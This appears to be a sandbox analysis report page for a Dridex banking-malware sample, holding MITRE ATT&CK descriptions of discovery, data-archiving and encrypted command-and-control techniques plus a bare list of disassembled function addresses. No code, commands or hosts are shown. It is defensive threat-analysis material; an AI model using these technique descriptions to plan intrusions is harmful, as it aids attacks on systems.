Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report gsG7jGFk3I

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: loaddll32.exe PID: 1712 Parent PID: 5788

General

Function 01392213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON

Function 6E8907CC, Relevance: 5.1, APIs: 3, Instructions: 628
COMMONCrypto

Function 6E881494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 6E89218C, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 6E892790, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 6E893060, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 00D52213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON

Function 6E891140, Relevance: 3.1, APIs: 2, Instructions: 91
COMMON

Function 6E895720, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 6E895AA8, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 6E895B29, Relevance: 1.6, APIs: 1, Instructions: 57
fileCOMMON

Function 6E895B3D, Relevance: 1.6, APIs: 1, Instructions: 56
fileCOMMON

Function 6E895B1F, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Function 6E895B68, Relevance: 1.6, APIs: 1, Instructions: 51
fileCOMMON

Function 6E895B6D, Relevance: 1.6, APIs: 1, Instructions: 51
fileCOMMON

Function 6E895D7C, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 6E8910CC, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 6E8955B8, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 6E895DF0, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Function 6E893564, Relevance: 1.5, APIs: 1, Instructions: 42
memoryCOMMON

Function 6E889144, Relevance: 2.4, Strings: 1, Instructions: 1104
COMMONCrypto

Function 6E88A5A4, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 6E8992DC, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 6E8884E4, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 6E8914D8, Relevance: .6, Instructions: 572
COMMONCrypto

Function 6E886DC8, Relevance: .0, Instructions: 36
COMMON

Function 6E88BC00, Relevance: .0, Instructions: 16
COMMON